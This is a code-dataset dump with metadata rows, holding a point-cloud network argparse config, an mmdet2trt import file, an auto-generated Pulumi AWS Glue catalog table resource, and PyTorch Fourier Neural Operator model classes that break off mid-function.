['C', 'C', 'C', 'S']], help='sequence of block to select (C or S) to use for each of the encoding steps')
parser.add_argument('--pooling_operation', type=lambda x: eval(x), default=[['max', 'max', 'max', 'max'],
['max', 'max', 'max', 'max'],
'max'], help='pooling layer to use at each resolution and each of the encoding steps')
parser.add_argument('--residuallinks_input', type=lambda x: eval(x), default=[], help='input of the residual links for the third encoding block')
parser.add_argument('--residuallinks_output', type=lambda x: eval(x), default=[], help='output of the residual links for the third encoding block')
parser.add_argument('--intermediate_size_fc', type=lambda x: eval(x), default=[512, 256], help='dimension of the outout linear layers')
parser.add_argument('--dropout_rate', type=lambda x: eval(x), default=[0.7], help='dropout rate to use')
parser.add_argument('--weight_decay', default=5*1e-4, help='weight decay')
parser.add_argument('--nb_interpolating_points', type=lambda x: eval(x), default=[[8, 8, 8], [8, 8, 8], None, 3, 3, 3], help='number of points to use for interpolation at each of the decoding steps')
parser.add_argument('--use_x_complete_unsampled', type=lambda x: eval(x), default=[True, True, True], help='whether to use skiplinks at each of the decoding steps')
parser.add_argument('--list_dim_channels_decoding', type=lambda x: eval(x), default=[[256, 256],
[256, 128],
[128, 128]], help='kernel size of the mlp applied after the pooling at each of the decoding steps')
parser.add_argument('--blockout_rate', type=lambda x: eval(x), default=[[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]], help='dropout rate of each of the convolutional block at each of the encoding steps')
return parser
def initialize_deepConvPN(self, parser):
parser.add_argument('--name', type=str, default='training_deepconvpn_partnet', help='training run name')
parser.add_argument('--desc', type=str, default='My training on PartNet with deepConvPN.', help='description')
parser.add_argument('--refine', type=str, default='', help='refine model at this path')
parser.add_argument('--batch_size', type=int, default=8, help='maximum number of samples within a batch')
parser.add_argument('--nb_subsampled_points', type=lambda x: eval(x), default=[[512, 256, 128],
[128, 96, 64]], help='resolution of the point cloud at each of the encoding steps (3 non increasing lists)')
parser.add_argument('--nb_neighbours', type=lambda x: eval(x), default=[[32, 32, 32, 32],
[64, 64, 64, 64]], help='number of neighbours to consider for each resolution and each of the encoding steps')
parser.add_argument('--sampling_method', type=lambda x: eval(x), default=[['query_ball', 'query_ball', 'query_ball', 'query_ball'],
['query_ball', 'query_ball', 'query_ball', 'query_ball']], help='sampling method to use for each resolution and each of the encoding steps')
parser.add_argument('--patch_radius', type=lambda x: eval(x), default=[[0.1, 0.2, 0.4, 0.4],
[0.2, 0.4, 0.8, 0.8]], help='radius of the query ball (if chosen) for each resolution and each of the encoding steps')
parser.add_argument('--list_dim_channels_encoding', type=lambda x: eval(x), default=[[[32, 32, 32, 32, 64, 64], [64, 64, 64, 64, 128, 128], [64, 64, 96, 96, 128, 128]],
[[64, 64, 64, 64, 128, 128], [128, 128, 128, 128, 256, 256], [128, 128, 128, 128, 256, 256]],
[256, 128, 256, 512, 128, 512, 1024, 128, 1024]], help='kernel size of the mlp applied before the pooling at each resolution and each of the encoding steps')
parser.add_argument('--use_x', type=lambda x: eval(x), default=[[True, True, True, True],
[True, True, True, True],
True], help='whether to use x as additional features for the linear layers at each resolution and each of the encoding steps')
parser.add_argument('--use_crosslinks', type=lambda x: eval(x), default=[False, False], help='whether to use x-link at each of the encoding steps')
parser.add_argument('--use_reslinks', type=lambda x: eval(x), default=[True, True], help='whether to use residual-link at each of the encoding steps')
parser.add_argument('--sequence', type=lambda x: eval(x), default=[['CS', 'C', 'C', 'C', 'C', 'C'],
['C', 'C', 'C', 'S', 'C', 'C', 'C']], help='sequence of block to select (C or S) to use for each of the encoding steps')
parser.add_argument('--pooling_operation', type=lambda x: eval(x), default=[['max', 'max', 'max', 'max'],
['max', 'max', 'max', 'max'],
'max'], help='pooling layer to use at each resolution and each of the encoding steps')
parser.add_argument('--residuallinks_input', type=lambda x: eval(x), default=[1, 4, 7], help='input of the residual links for the third encoding block')
parser.add_argument('--residuallinks_output', type=lambda x: eval(x), default=[2, 5, 8], help='output of the residual links for the third encoding block')
parser.add_argument('--intermediate_size_fc', type=lambda x: eval(x), default=[512, 256], help='dimension of the outout linear layers')
parser.add_argument('--dropout_rate', type=lambda x: eval(x), default=[0.7], help='dropout rate to use')
parser.add_argument('--weight_decay', default=5*1e-4, help='weight decay')
parser.add_argument('--nb_interpolating_points', type=lambda x: eval(x), default=[[8, 8, 8], [8, 8, 8], None, 3, 3, 3], help='number of points to use for interpolation at each of the decoding steps')
parser.add_argument('--use_x_complete_unsampled', type=lambda x: eval(x), default=[True, True, True], help='whether to use skiplinks at each of the decoding steps')
parser.add_argument('--list_dim_channels_decoding', type=lambda x: eval(x), default=[[256, 256],
[256, 128],
[128, 128]], help='kernel size of the mlp applied after the pooling at each of the decoding steps')
parser.add_argument('--blockout_rate', type=lambda x: eval(x), default=[[0,0,0,0,0,0],
[0,0,0,0,0,0]], help='dropout rate of each of the convolutional block at each of the encoding steps')
return parser
| 120.298387
| 250
| 0.500134
| 3,352
| 29,834
| 4.352625
| 0.057578
| 0.070322
| 0.132831
| 0.083276
| 0.926319
| 0.918369
| 0.914119
| 0.912132
| 0.911446
| 0.902262
| 0
| 0.045094
| 0.378595
| 29,834
| 248
| 251
| 120.298387
| 0.741895
| 0.003955
| 0
| 0.728814
| 0
| 0
| 0.324026
| 0.042204
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025424
| false
| 0
| 0.016949
| 0
| 0.072034
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
582009347dd106a8c7d8202695e94770b51c126b
| 127
|
py
|
Python
|
mmdet2trt/core/anchor/__init__.py
|
jackweiwang/mmdetection-to-tensorrt
|
f988ba8e923764fb1173385a1c7160b8f8b5bd99
|
[
"Apache-2.0"
] | 1
|
2021-08-23T10:09:37.000Z
|
2021-08-23T10:09:37.000Z
|
mmdet2trt/core/anchor/__init__.py
|
gcong18/mmdetection-to-tensorrt
|
c31c32ee4720ff56010bcda77bacf3a110d0526c
|
[
"Apache-2.0"
] | null | null | null |
mmdet2trt/core/anchor/__init__.py
|
gcong18/mmdetection-to-tensorrt
|
c31c32ee4720ff56010bcda77bacf3a110d0526c
|
[
"Apache-2.0"
] | null | null | null |
from .anchor_generator import AnchorGeneratorWraper, SSDAnchorGeneratorWraper
from .point_generator import PointGeneratorWraper
| 63.5
| 77
| 0.913386
| 11
| 127
| 10.363636
| 0.727273
| 0.263158
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.062992
| 127
| 2
| 78
| 63.5
| 0.957983
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
584fe8791bbdb068bf52559af2739c9eba4ad57d
| 18,680
|
py
|
Python
|
sdk/python/pulumi_aws/glue/catalog_table.py
|
dixler/pulumi-aws
|
88838ed6d412c092717a916b0b5b154f68226c3a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/glue/catalog_table.py
|
dixler/pulumi-aws
|
88838ed6d412c092717a916b0b5b154f68226c3a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/glue/catalog_table.py
|
dixler/pulumi-aws
|
88838ed6d412c092717a916b0b5b154f68226c3a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class CatalogTable(pulumi.CustomResource):
catalog_id: pulumi.Output[str]
"""
ID of the Glue Catalog and database to create the table in. If omitted, this defaults to the AWS Account ID plus the database name.
"""
database_name: pulumi.Output[str]
"""
Name of the metadata database where the table metadata resides. For Hive compatibility, this must be all lowercase.
"""
description: pulumi.Output[str]
"""
Description of the table.
"""
name: pulumi.Output[str]
"""
Name of the SerDe.
"""
owner: pulumi.Output[str]
"""
Owner of the table.
"""
parameters: pulumi.Output[dict]
"""
A map of initialization parameters for the SerDe, in key-value form.
"""
partition_keys: pulumi.Output[list]
"""
A list of columns by which the table is partitioned. Only primitive types are supported as partition keys.
* `comment` (`str`) - Free-form text comment.
* `name` (`str`) - Name of the SerDe.
* `type` (`str`) - The datatype of data in the Column.
"""
retention: pulumi.Output[float]
"""
Retention time for this table.
"""
storage_descriptor: pulumi.Output[dict]
"""
A storage descriptor object containing information about the physical storage of this table. You can refer to the [Glue Developer Guide](https://docs.aws.amazon.com/glue/latest/dg/aws-glue-api-catalog-tables.html#aws-glue-api-catalog-tables-StorageDescriptor) for a full explanation of this object.
* `bucketColumns` (`list`) - A list of reducer grouping columns, clustering columns, and bucketing columns in the table.
* `columns` (`list`) - A list of the Columns in the table.
* `comment` (`str`) - Free-form text comment.
* `name` (`str`) - Name of the SerDe.
* `type` (`str`) - The datatype of data in the Column.
* `compressed` (`bool`) - True if the data in the table is compressed, or False if not.
* `inputFormat` (`str`) - The input format: SequenceFileInputFormat (binary), or TextInputFormat, or a custom format.
* `location` (`str`) - The physical location of the table. By default this takes the form of the warehouse location, followed by the database location in the warehouse, followed by the table name.
* `numberOfBuckets` (`float`) - Must be specified if the table contains any dimension columns.
* `outputFormat` (`str`) - The output format: SequenceFileOutputFormat (binary), or IgnoreKeyTextOutputFormat, or a custom format.
* `parameters` (`dict`) - A map of initialization parameters for the SerDe, in key-value form.
* `serDeInfo` (`dict`) - Serialization/deserialization (SerDe) information.
* `name` (`str`) - Name of the SerDe.
* `parameters` (`dict`) - A map of initialization parameters for the SerDe, in key-value form.
* `serializationLibrary` (`str`) - Usually the class that implements the SerDe. An example is: org.apache.hadoop.hive.serde2.columnar.ColumnarSerDe.
* `skewedInfo` (`dict`) - Information about values that appear very frequently in a column (skewed values).
* `skewedColumnNames` (`list`) - A list of names of columns that contain skewed values.
* `skewedColumnValueLocationMaps` (`dict`) - A list of values that appear so frequently as to be considered skewed.
* `skewedColumnValues` (`list`) - A mapping of skewed values to the columns that contain them.
* `sortColumns` (`list`) - A list of Order objects specifying the sort order of each bucket in the table.
* `column` (`str`) - The name of the column.
* `sortOrder` (`float`) - Indicates that the column is sorted in ascending order (== 1), or in descending order (==0).
* `storedAsSubDirectories` (`bool`) - True if the table data is stored in subdirectories, or False if not.
"""
table_type: pulumi.Output[str]
"""
The type of this table (EXTERNAL_TABLE, VIRTUAL_VIEW, etc.).
"""
view_expanded_text: pulumi.Output[str]
"""
If the table is a view, the expanded text of the view; otherwise null.
"""
view_original_text: pulumi.Output[str]
"""
If the table is a view, the original text of the view; otherwise null.
"""
def __init__(__self__, resource_name, opts=None, catalog_id=None, database_name=None, description=None, name=None, owner=None, parameters=None, partition_keys=None, retention=None, storage_descriptor=None, table_type=None, view_expanded_text=None, view_original_text=None, __props__=None, __name__=None, __opts__=None):
"""
Provides a Glue Catalog Table Resource. You can refer to the [Glue Developer Guide](http://docs.aws.amazon.com/glue/latest/dg/populate-data-catalog.html) for a full explanation of the Glue Data Catalog functionality.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] catalog_id: ID of the Glue Catalog and database to create the table in. If omitted, this defaults to the AWS Account ID plus the database name.
:param pulumi.Input[str] database_name: Name of the metadata database where the table metadata resides. For Hive compatibility, this must be all lowercase.
:param pulumi.Input[str] description: Description of the table.
:param pulumi.Input[str] name: Name of the SerDe.
:param pulumi.Input[str] owner: Owner of the table.
:param pulumi.Input[dict] parameters: A map of initialization parameters for the SerDe, in key-value form.
:param pulumi.Input[list] partition_keys: A list of columns by which the table is partitioned. Only primitive types are supported as partition keys.
:param pulumi.Input[float] retention: Retention time for this table.
:param pulumi.Input[dict] storage_descriptor: A storage descriptor object containing information about the physical storage of this table. You can refer to the [Glue Developer Guide](https://docs.aws.amazon.com/glue/latest/dg/aws-glue-api-catalog-tables.html#aws-glue-api-catalog-tables-StorageDescriptor) for a full explanation of this object.
:param pulumi.Input[str] table_type: The type of this table (EXTERNAL_TABLE, VIRTUAL_VIEW, etc.).
:param pulumi.Input[str] view_expanded_text: If the table is a view, the expanded text of the view; otherwise null.
:param pulumi.Input[str] view_original_text: If the table is a view, the original text of the view; otherwise null.
The **partition_keys** object supports the following:
* `comment` (`pulumi.Input[str]`) - Free-form text comment.
* `name` (`pulumi.Input[str]`) - Name of the SerDe.
* `type` (`pulumi.Input[str]`) - The datatype of data in the Column.
The **storage_descriptor** object supports the following:
* `bucketColumns` (`pulumi.Input[list]`) - A list of reducer grouping columns, clustering columns, and bucketing columns in the table.
* `columns` (`pulumi.Input[list]`) - A list of the Columns in the table.
* `comment` (`pulumi.Input[str]`) - Free-form text comment.
* `name` (`pulumi.Input[str]`) - Name of the SerDe.
* `type` (`pulumi.Input[str]`) - The datatype of data in the Column.
* `compressed` (`pulumi.Input[bool]`) - True if the data in the table is compressed, or False if not.
* `inputFormat` (`pulumi.Input[str]`) - The input format: SequenceFileInputFormat (binary), or TextInputFormat, or a custom format.
* `location` (`pulumi.Input[str]`) - The physical location of the table. By default this takes the form of the warehouse location, followed by the database location in the warehouse, followed by the table name.
* `numberOfBuckets` (`pulumi.Input[float]`) - Must be specified if the table contains any dimension columns.
* `outputFormat` (`pulumi.Input[str]`) - The output format: SequenceFileOutputFormat (binary), or IgnoreKeyTextOutputFormat, or a custom format.
* `parameters` (`pulumi.Input[dict]`) - A map of initialization parameters for the SerDe, in key-value form.
* `serDeInfo` (`pulumi.Input[dict]`) - Serialization/deserialization (SerDe) information.
* `name` (`pulumi.Input[str]`) - Name of the SerDe.
* `parameters` (`pulumi.Input[dict]`) - A map of initialization parameters for the SerDe, in key-value form.
* `serializationLibrary` (`pulumi.Input[str]`) - Usually the class that implements the SerDe. An example is: org.apache.hadoop.hive.serde2.columnar.ColumnarSerDe.
* `skewedInfo` (`pulumi.Input[dict]`) - Information about values that appear very frequently in a column (skewed values).
* `skewedColumnNames` (`pulumi.Input[list]`) - A list of names of columns that contain skewed values.
* `skewedColumnValueLocationMaps` (`pulumi.Input[dict]`) - A list of values that appear so frequently as to be considered skewed.
* `skewedColumnValues` (`pulumi.Input[list]`) - A mapping of skewed values to the columns that contain them.
* `sortColumns` (`pulumi.Input[list]`) - A list of Order objects specifying the sort order of each bucket in the table.
* `column` (`pulumi.Input[str]`) - The name of the column.
* `sortOrder` (`pulumi.Input[float]`) - Indicates that the column is sorted in ascending order (== 1), or in descending order (==0).
* `storedAsSubDirectories` (`pulumi.Input[bool]`) - True if the table data is stored in subdirectories, or False if not.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/glue_catalog_table.html.markdown.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['catalog_id'] = catalog_id
if database_name is None:
raise TypeError("Missing required property 'database_name'")
__props__['database_name'] = database_name
__props__['description'] = description
__props__['name'] = name
__props__['owner'] = owner
__props__['parameters'] = parameters
__props__['partition_keys'] = partition_keys
__props__['retention'] = retention
__props__['storage_descriptor'] = storage_descriptor
__props__['table_type'] = table_type
__props__['view_expanded_text'] = view_expanded_text
__props__['view_original_text'] = view_original_text
super(CatalogTable, __self__).__init__(
'aws:glue/catalogTable:CatalogTable',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, catalog_id=None, database_name=None, description=None, name=None, owner=None, parameters=None, partition_keys=None, retention=None, storage_descriptor=None, table_type=None, view_expanded_text=None, view_original_text=None):
"""
Get an existing CatalogTable resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] catalog_id: ID of the Glue Catalog and database to create the table in. If omitted, this defaults to the AWS Account ID plus the database name.
:param pulumi.Input[str] database_name: Name of the metadata database where the table metadata resides. For Hive compatibility, this must be all lowercase.
:param pulumi.Input[str] description: Description of the table.
:param pulumi.Input[str] name: Name of the SerDe.
:param pulumi.Input[str] owner: Owner of the table.
:param pulumi.Input[dict] parameters: A map of initialization parameters for the SerDe, in key-value form.
:param pulumi.Input[list] partition_keys: A list of columns by which the table is partitioned. Only primitive types are supported as partition keys.
:param pulumi.Input[float] retention: Retention time for this table.
:param pulumi.Input[dict] storage_descriptor: A storage descriptor object containing information about the physical storage of this table. You can refer to the [Glue Developer Guide](https://docs.aws.amazon.com/glue/latest/dg/aws-glue-api-catalog-tables.html#aws-glue-api-catalog-tables-StorageDescriptor) for a full explanation of this object.
:param pulumi.Input[str] table_type: The type of this table (EXTERNAL_TABLE, VIRTUAL_VIEW, etc.).
:param pulumi.Input[str] view_expanded_text: If the table is a view, the expanded text of the view; otherwise null.
:param pulumi.Input[str] view_original_text: If the table is a view, the original text of the view; otherwise null.
The **partition_keys** object supports the following:
* `comment` (`pulumi.Input[str]`) - Free-form text comment.
* `name` (`pulumi.Input[str]`) - Name of the SerDe.
* `type` (`pulumi.Input[str]`) - The datatype of data in the Column.
The **storage_descriptor** object supports the following:
* `bucketColumns` (`pulumi.Input[list]`) - A list of reducer grouping columns, clustering columns, and bucketing columns in the table.
* `columns` (`pulumi.Input[list]`) - A list of the Columns in the table.
* `comment` (`pulumi.Input[str]`) - Free-form text comment.
* `name` (`pulumi.Input[str]`) - Name of the SerDe.
* `type` (`pulumi.Input[str]`) - The datatype of data in the Column.
* `compressed` (`pulumi.Input[bool]`) - True if the data in the table is compressed, or False if not.
* `inputFormat` (`pulumi.Input[str]`) - The input format: SequenceFileInputFormat (binary), or TextInputFormat, or a custom format.
* `location` (`pulumi.Input[str]`) - The physical location of the table. By default this takes the form of the warehouse location, followed by the database location in the warehouse, followed by the table name.
* `numberOfBuckets` (`pulumi.Input[float]`) - Must be specified if the table contains any dimension columns.
* `outputFormat` (`pulumi.Input[str]`) - The output format: SequenceFileOutputFormat (binary), or IgnoreKeyTextOutputFormat, or a custom format.
* `parameters` (`pulumi.Input[dict]`) - A map of initialization parameters for the SerDe, in key-value form.
* `serDeInfo` (`pulumi.Input[dict]`) - Serialization/deserialization (SerDe) information.
* `name` (`pulumi.Input[str]`) - Name of the SerDe.
* `parameters` (`pulumi.Input[dict]`) - A map of initialization parameters for the SerDe, in key-value form.
* `serializationLibrary` (`pulumi.Input[str]`) - Usually the class that implements the SerDe. An example is: org.apache.hadoop.hive.serde2.columnar.ColumnarSerDe.
* `skewedInfo` (`pulumi.Input[dict]`) - Information about values that appear very frequently in a column (skewed values).
* `skewedColumnNames` (`pulumi.Input[list]`) - A list of names of columns that contain skewed values.
* `skewedColumnValueLocationMaps` (`pulumi.Input[dict]`) - A list of values that appear so frequently as to be considered skewed.
* `skewedColumnValues` (`pulumi.Input[list]`) - A mapping of skewed values to the columns that contain them.
* `sortColumns` (`pulumi.Input[list]`) - A list of Order objects specifying the sort order of each bucket in the table.
* `column` (`pulumi.Input[str]`) - The name of the column.
* `sortOrder` (`pulumi.Input[float]`) - Indicates that the column is sorted in ascending order (== 1), or in descending order (==0).
* `storedAsSubDirectories` (`pulumi.Input[bool]`) - True if the table data is stored in subdirectories, or False if not.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/glue_catalog_table.html.markdown.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["catalog_id"] = catalog_id
__props__["database_name"] = database_name
__props__["description"] = description
__props__["name"] = name
__props__["owner"] = owner
__props__["parameters"] = parameters
__props__["partition_keys"] = partition_keys
__props__["retention"] = retention
__props__["storage_descriptor"] = storage_descriptor
__props__["table_type"] = table_type
__props__["view_expanded_text"] = view_expanded_text
__props__["view_original_text"] = view_original_text
return CatalogTable(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 66.476868
| 352
| 0.676767
| 2,393
| 18,680
| 5.159632
| 0.115336
| 0.067709
| 0.045355
| 0.024621
| 0.864906
| 0.852515
| 0.843363
| 0.829675
| 0.821414
| 0.820604
| 0
| 0.000691
| 0.225268
| 18,680
| 280
| 353
| 66.714286
| 0.852474
| 0.529979
| 0
| 0.026316
| 1
| 0
| 0.149606
| 0.008366
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0.013158
| 0.078947
| 0.026316
| 0.342105
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
587357f0302b1d29d4d84210c770bc49f320507b
| 17,753
|
py
|
Python
|
models/FNO.py
|
meliao/fourier_neural_operator
|
216915c6f1acd0651c7203bc8f16824efc495c5f
|
[
"MIT"
] | null | null | null |
models/FNO.py
|
meliao/fourier_neural_operator
|
216915c6f1acd0651c7203bc8f16824efc495c5f
|
[
"MIT"
] | null | null | null |
models/FNO.py
|
meliao/fourier_neural_operator
|
216915c6f1acd0651c7203bc8f16824efc495c5f
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
# import torch.fft as fft
# from torch.nn.parameter import Parameter
class SpectralConv1d(nn.Module):
def __init__(self, in_channels, out_channels, modes1):
super(SpectralConv1d, self).__init__()
"""
1D Fourier layer. It does FFT, linear transform, and Inverse FFT.
"""
self.in_channels = in_channels
self.out_channels = out_channels
self.modes1 = modes1 #Number of Fourier modes to multiply, at most floor(N/2) + 1
self.scale = (1 / (in_channels*out_channels))
self.weights1 = nn.Parameter(self.scale * torch.rand(in_channels, out_channels, self.modes1, dtype=torch.cfloat))
# Complex multiplication
def compl_mul1d(self, input, weights):
# (batch, in_channel, x ), (in_channel, out_channel, x) -> (batch, out_channel, x)
return torch.einsum("bix,iox->box", input, weights)
def forward(self, x):
batchsize = x.shape[0]
#Compute Fourier coeffcients up to factor of e^(- something constant)
x_ft = torch.fft.rfft(x)
# Multiply relevant Fourier modes
out_ft = torch.zeros(batchsize, self.out_channels, x.size(-1)//2 + 1, device=x.device, dtype=torch.cfloat)
out_ft[:, :, :self.modes1] = self.compl_mul1d(x_ft[:, :, :self.modes1], self.weights1)
#Return to physical space
x = torch.fft.irfft(out_ft, n=x.size(-1))
return x
class FNO1dComplexTime(nn.Module):
def __init__(self, modes, width):
super(FNO1dComplexTime, self).__init__()
"""
The overall network. It contains 4 layers of the Fourier layer.
1. Lift the input to the desire channel dimension by self.fc0 .
2. 4 layers of the integral operators u' = (W + K)(u).
W defined by self.w; K defined by self.conv .
3. Project from the channel space to the output space by self.fc1 and self.fc2 .
input: the solution of the initial condition and location (Re(a(x)), Im(a(x)), x)
input shape: (batchsize, x=s, c=3)
output: the solution of a later timestep
output shape: (batchsize, x=s, c=2)
"""
self.modes1 = modes
self.width = width
self.fc0 = nn.Linear(4, self.width) # input channel is 3: (Re(a(x)), Im(a(x)), x)
self.conv0 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv1 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv2 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv3 = SpectralConv1d(self.width, self.width, self.modes1)
self.w0 = nn.Conv1d(self.width, self.width, 1)
self.w1 = nn.Conv1d(self.width, self.width, 1)
self.w2 = nn.Conv1d(self.width, self.width, 1)
self.w3 = nn.Conv1d(self.width, self.width, 1)
self.fc1 = nn.Linear(self.width, 128)
self.fc2 = nn.Linear(128, 2)
def forward(self, x, t):
# print("INPUT X SHAPE: {} DTYPE: {}".format(x.shape, x.dtype))
# print("INPUT T SHAPE: {} DTYPE: {}".format(t.shape, t.dtype))
# print("T: {}".format(t))
# print("T0: {}".format(t[0]))
# print("T1: {}".format(t[1]))
# print("INPUT T SHAPE: {} DTYPE: {}".format(t.shape, t.dtype))
# o = torch.ones((1, x.size()[1]), dtype = torch.float)
# print("INPUT O SHAPE: {} DTYPE: {}".format(o.shape, o.dtype))
# t_arr = torch.matmul(t, o)
t = t.view(-1, 1, 1).repeat([1, x.shape[1], 1])
x = torch.cat([x, t], dim=2)
x = self.fc0(x)
x = x.permute(0, 2, 1)
x1 = self.conv0(x)
x2 = self.w0(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv1(x)
x2 = self.w1(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv2(x)
x2 = self.w2(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv3(x)
x2 = self.w3(x)
x = x1 + x2
x = x.permute(0, 2, 1)
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
return torch.view_as_complex(x)
class FNO1dComplex(nn.Module):
def __init__(self, modes, width):
super(FNO1dComplex, self).__init__()
"""
The overall network. It contains 4 layers of the Fourier layer.
1. Lift the input to the desire channel dimension by self.fc0 .
2. 4 layers of the integral operators u' = (W + K)(u).
W defined by self.w; K defined by self.conv .
3. Project from the channel space to the output space by self.fc1 and self.fc2 .
input: the solution of the initial condition and location (Re(a(x)), Im(a(x)), x)
input shape: (batchsize, x=s, c=3)
output: the solution of a later timestep
output shape: (batchsize, x=s, c=2)
"""
self.modes1 = modes
self.width = width
self.fc0 = nn.Linear(3, self.width) # input channel is 3: (Re(a(x)), Im(a(x)), x)
self.conv0 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv1 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv2 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv3 = SpectralConv1d(self.width, self.width, self.modes1)
self.w0 = nn.Conv1d(self.width, self.width, 1)
self.w1 = nn.Conv1d(self.width, self.width, 1)
self.w2 = nn.Conv1d(self.width, self.width, 1)
self.w3 = nn.Conv1d(self.width, self.width, 1)
self.fc1 = nn.Linear(self.width, 128)
self.fc2 = nn.Linear(128, 2)
def forward(self, x):
x = self.fc0(x)
x = x.permute(0, 2, 1)
x1 = self.conv0(x)
x2 = self.w0(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv1(x)
x2 = self.w1(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv2(x)
x2 = self.w2(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv3(x)
x2 = self.w3(x)
x = x1 + x2
x = x.permute(0, 2, 1)
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
return torch.view_as_complex(x)
class FNO1dReal(nn.Module):
def __init__(self, modes, width):
super(FNO1dReal, self).__init__()
"""
The overall network. It contains 4 layers of the Fourier layer.
1. Lift the input to the desire channel dimension by self.fc0 .
2. 4 layers of the integral operators u' = (W + K)(u).
W defined by self.w; K defined by self.conv .
3. Project from the channel space to the output space by self.fc1 and self.fc2 .
input: the solution of the initial condition and location (a(x), x)
input shape: (batchsize, x=s, c=2)
output: the solution of a later timestep
output shape: (batchsize, x=s, c=1)
"""
self.modes1 = modes
self.width = width
self.fc0 = nn.Linear(2, self.width) # input channel is 3: (Re(a(x)), Im(a(x)), x)
self.conv0 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv1 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv2 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv3 = SpectralConv1d(self.width, self.width, self.modes1)
self.w0 = nn.Conv1d(self.width, self.width, 1)
self.w1 = nn.Conv1d(self.width, self.width, 1)
self.w2 = nn.Conv1d(self.width, self.width, 1)
self.w3 = nn.Conv1d(self.width, self.width, 1)
self.fc1 = nn.Linear(self.width, 128)
self.fc2 = nn.Linear(128, 1)
def forward(self, x):
x = self.fc0(x)
x = x.permute(0, 2, 1)
x1 = self.conv0(x)
x2 = self.w0(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv1(x)
x2 = self.w1(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv2(x)
x2 = self.w2(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv3(x)
x2 = self.w3(x)
x = x1 + x2
x = x.permute(0, 2, 1)
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
return x.squeeze()
class SinEncoder1dReal(nn.Module):
def __init__(self, width):
super(SinEncoder1dReal, self).__init__()
self.width = width
self.max_freq = int(np.floor((self.width - 1) / 2))
self.ones_padding = self.width % 2 == 0
self.freqs = torch.arange(self.max_freq)
LHS = 1 + 2 * self.max_freq + int(self.ones_padding)
assert LHS == self.width, "{} != {}".format(LHS, self.width)
def forward(self, x):
n_batch, n_grid, n_channels = x.shape
